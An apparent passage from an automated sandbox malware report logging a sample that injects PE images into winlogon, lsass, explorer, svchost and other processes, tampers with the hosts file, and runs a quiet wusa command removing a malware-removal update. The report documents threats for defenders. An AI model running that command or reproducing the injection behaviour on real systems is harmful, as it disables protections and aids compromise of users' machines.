            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 919C273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 25F0273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E0F1273C
            Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 5399273C
            Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: D8BA273C
            Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: BD13273C
            Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: F8B7273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8AFD273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8F3D273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5484273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7658273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5E79273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 10D3273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A2B7273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 3CBD273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B73D273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E96E273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 9D0D273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 66FD273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D653273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6378273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FF1A273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C613273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F107273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8BB273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 54DA273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2053273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E9EA273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A634273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A5273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5C5A273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 464E273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 351A273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8C46273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 9A2273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 3F94273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B0273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6A5B273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C5E9273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 3AF3273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B1D273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A05C273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B046273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7CF4273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FCB8273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1ED7273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7C55273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FE03273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 93B273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4A273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D825273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8759273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AA0B273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B2273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 9257273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1FCE273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: CFED273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 73B6273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6E81273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AA13273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FBD6273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 28E0273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 573273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7EE6273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8C03273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 99B5273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 9495273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7856273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 311C273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 39FC273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 311A273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A6C5273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 47BC273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D5F4273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 9F94273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: CA85273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 80B3273C
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 80B6273C
            Injects a PE file into a foreign processes
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 1F385B90000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 2A2911C0000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 14E255D0000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 283E0EE0000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 1F385BF0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 2A2919C0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 14E25F00000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 283E0F10000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1FB53990000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1CBD8BA0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F2BD130000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 229F8B70000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2938AFD0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2258F3D0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26F54840000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22B76580000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1265E790000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 18510D30000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 200A2B70000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F33CBD0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1FAB73D0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D3E96E0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2389D0D0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22E66FD0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A4D6530000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20763780000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 200FF1A0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23CC6130000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 266F1070000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26008BB0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 12E54DA0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2CF20530000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1FDE9EA0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 19EA6340000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: A50000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1ED5C5A0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1EC464E0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15B351A0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C38C460000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1DC09A20000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C73F940000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 22300B00000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1616A5B0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 181C5E90000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 18E3AF30000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D70B1D0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26DA05C0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C9B0460000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23A7CF40000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 184FCB80000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 1CF1ED70000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1697C550000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F0FE030000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1FC093B0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C8004A0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 118D8250000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 27687590000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28FAA0B0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: B20000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 19292570000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 2A31FCE0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 221CFED0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23D73B60000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1EF6E810000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 15DAA130000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 269FBD60000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 14A28E00000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 19605730000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1D87EE60000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 17D8C030000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 12899B50000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 29B94950000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 22978560000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1C3311C0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1BC39FC0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1DA311A0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1ECA6C50000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17847BC0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 231D5F40000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 1D49F940000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 24FCA850000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1F180B30000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1F180B60000 value starts with: 4D5A
            Injects code into the Windows Explorer (explorer.exe)
            Source: C:\Windows\System32\dialer.exeMemory written: PID: 3504 base: B20000 value: 4D
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Users\user\Desktop\file.exeThread register set: target process: 7296Jump to behavior
            Source: C:\ProgramData\Google\Chrome\updater.exeThread register set: target process: 7176Jump to behavior
            Source: C:\ProgramData\Google\Chrome\updater.exeThread register set: target process: 5948Jump to behavior
            Source: C:\ProgramData\Google\Chrome\updater.exeThread register set: target process: 5568Jump to behavior
            Modifies the hosts file
            Source: C:\Users\user\Desktop\file.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Writes to foreign memory regions
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 1F385B90000Jump to behavior
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 2A2911C0000Jump to behavior
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 14E255D0000Jump to behavior
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 283E0EE0000Jump to behavior
            Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 231D5F30000Jump to behavior
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 1F385BF0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 2A2919C0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 14E25F00000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 283E0F10000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1FB53990000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1CBD8BA0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F2BD130000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 229F8B70000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2938AFD0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2258F3D0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26F54840000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22B76580000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1265E790000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 18510D30000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 200A2B70000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F33CBD0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1FAB73D0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D3E96E0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2389D0D0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22E66FD0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A4D6530000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20763780000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 200FF1A0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23CC6130000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 266F1070000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26008BB0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 12E54DA0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2CF20530000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1FDE9EA0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 19EA6340000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: A50000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1ED5C5A0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1EC464E0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15B351A0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C38C460000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1DC09A20000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C73F940000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 22300B00000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1616A5B0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 181C5E90000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 18E3AF30000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D70B1D0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26DA05C0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C9B0460000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23A7CF40000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 184FCB80000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 1CF1ED70000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1697C550000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F0FE030000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1FC093B0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C8004A0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 118D8250000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 27687590000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28FAA0B0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: B20000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 19292570000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 2A31FCE0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 221CFED0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23D73B60000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1EF6E810000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 15DAA130000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 269FBD60000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 14A28E00000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 19605730000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1D87EE60000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 17D8C030000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 12899B50000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 29B94950000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 22978560000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1C3311C0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1BC39FC0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1DA311A0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1ECA6C50000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17847BC0000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 231D5F40000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 1D49F940000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 24FCA850000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1F180B30000
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1F180B60000
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe dialer.exeJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\Windows\System32\dialer.exeCode function: 25_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,25_2_0000000140001B54
            Source: C:\Windows\System32\dialer.exeCode function: 25_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,25_2_0000000140001B54
            Source: winlogon.exe, 0000001F.00000000.1385824484.000001F386111000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000001F.00000002.2577899056.000001F386111000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000029.00000000.1405448442.00000283DBDF1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: winlogon.exe, 0000001F.00000000.1385824484.000001F386111000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000001F.00000002.2577899056.000001F386111000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000029.00000000.1405448442.00000283DBDF1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: winlogon.exe, 0000001F.00000000.1385824484.000001F386111000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000001F.00000002.2577899056.000001F386111000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000029.00000000.1405448442.00000283DBDF1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: winlogon.exe, 0000001F.00000000.1385824484.000001F386111000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000001F.00000002.2577899056.000001F386111000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000029.00000000.1405448442.00000283DBDF1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: dwm.exe, 00000029.00000002.2583120583.00000283DB78C000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 00000029.00000000.1403724912.00000283DB78C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerS
            Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001F385BA36F0 cpuid 31_2_000001F385BA36F0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
